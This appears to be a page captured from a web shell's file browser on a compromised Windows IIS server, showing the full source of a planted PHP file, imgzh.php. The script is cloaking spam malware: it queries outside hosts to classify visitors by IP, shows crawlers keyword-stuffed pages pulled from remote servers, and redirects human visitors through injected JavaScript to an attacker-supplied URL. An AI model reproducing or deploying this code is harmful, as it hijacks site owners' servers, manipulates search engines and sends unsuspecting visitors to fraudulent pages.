HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
$ pwd: D:/HostingSpaces/JTent/tentje.com/wwwroot/
Upload Files
File: D:/HostingSpaces/JTent/tentje.com/wwwroot/imgzh.php
<?php 
error_reporting(E_ALL^E_NOTICE^E_WARNING);
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
function check($ip){
	if(!is_null($_GET['kk'])){$ip="66.249.64.190";}
    $domain = file_get_contents("http://wfjs.a123.fr/getdomain.aspx?rnd=1&ip=".$ip);
     if(stripos($domain,'google')!=false or stripos($domain,'msn.com')!=false or stripos($domain,'yahoo.com')!=false or stripos($domain,'aol.com')!=false){}
else
{	if(!is_null($_GET['zhzh']))	 
	{
echo '<script>document.location="'.file_get_contents('http://wfjs.a123.fr/tzz.txt')."?cid=".$_GET['cid']."&cname=".urlencode($_GET['zhzh'])."&xi=".$_GET['xi']."&xc=".$_GET['xc'].'"</script>';
exit();
	}
}	
   }
   function getIP() { 
		if (getenv('HTTP_CLIENT_IP')) { 
			$ip = getenv('HTTP_CLIENT_IP'); 
		} elseif (getenv('HTTP_X_FORWARDED_FOR')) { 
			$ip = getenv('HTTP_X_FORWARDED_FOR'); 
		} elseif (getenv('HTTP_X_FORWARDED')) { 
			$ip = getenv('HTTP_X_FORWARDED'); 
		} elseif (getenv('HTTP_FORWARDED_FOR')) { 
			$ip = getenv('HTTP_FORWARDED_FOR'); 
		} elseif (getenv('HTTP_FORWARDED')) { 
			$ip = getenv('HTTP_FORWARDED'); 
		} else { 
			$ip = $_SERVER['REMOTE_ADDR']; 
		} 
		return $ip; 
	} 
$validate = check(getIP());
$cid=file_get_contents("http://wfjs.a123.fr/zhsj.asp");
if(!is_null($_GET['cid'])){$cid=$_GET['cid'];}
$gjc=$_GET['zhzh'];
$gjc1=file_get_contents("http://wzdy.lc7.fr/getci.aspx?cid=".$cid."&s=2&e=4");
$gjc2=file_get_contents("http://wzdy.lc7.fr/getci.aspx?cid=".$cid."&s=5&e=7");
?><?php
if(!is_null($_GET['number'])){
$url="http://wzdy.lc7.fr/snp.aspx?cid=".$cid."&number=".$_GET['number']."&xi=1-6&xc=19-26";
 $str=file_get_contents($url);
 $str=str_replace('yymm',$http_type.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'],$str);
 $str=str_replace('shop=','zhzh=',$str);
 echo $str;
 exit();
 }?>
<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title><?php echo $gjc?> Off <?php echo mt_rand(50,70)?>% - <?php echo $_SERVER['HTTP_HOST']?></title>
<meta name="keywords" content="<?php echo $gjc?>,<?php echo $gjc1?>"/>
<meta name="description" content="<?php echo $gjc?>,<?php echo $gjc2?>." />
<meta name="robots" content="index,follow,all"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<META NAME="Robots"  CONTENT="index, follows">
<META NAME="Audience"  CONTENT="All">
<link href="site/styles.css" rel="stylesheet" type="text/css">
<style>
@media (max-width: 768px)
{
body {
	width:100%;
	height:100%;
}
body {
	font-family:Open Sans,'Helvetica Neue',Arial,sans-serif;
	font-size:15px;
	color:#777;
	line-height:1.7;
}
 img{ width:80%}
 iframe{ max-width:100% !important; height:auto;    float: left;}
 div { width:100% !important; float:left}
 div span{ width:100%;float:left}
a {
	color:#f05f40;
	-webkit-transition:all .35s;
	-moz-transition:all .35s;
	transition:all .35s;
}
a:hover,a:focus {
	color:#eb3812;
}
  
}
</style>
</head>
<body>
<?php
$url="";
if(!is_null($gjc))
{$wid=mt_rand(1,4108);
 $url="http://wzdy.lc7.fr/mb2.aspx?cid=".$_GET['cid']."&shop=".urlencode($gjc)."&xi=".$_GET['xi']."&xc=".$_GET['xc']."&page=".$_SERVER['SCRIPT_NAME']."&mt=http://wfjs.a123.fr/ar/ar_".$wid.".txt";}
else{$url="http://wzdy.lc7.fr/mb2.aspx?cid=".$cid."&xi=1-6&xc=19-26&pnum=".$_GET['pnum']."&page=".$_SERVER['SCRIPT_NAME'];}
 $str=file_get_contents($url);
 $str=str_replace('&shop=','&zhzh=',$str);
 echo $str;
?>
<div><?php echo file_get_contents("http://wfjs.a123.fr/hlzh.aspx?page=".$_SERVER['SCRIPT_NAME'])?> | <?php echo file_get_contents("http://wfjs.a123.fr/wl.asp")?></div>
</body>
</html>
@ Telegram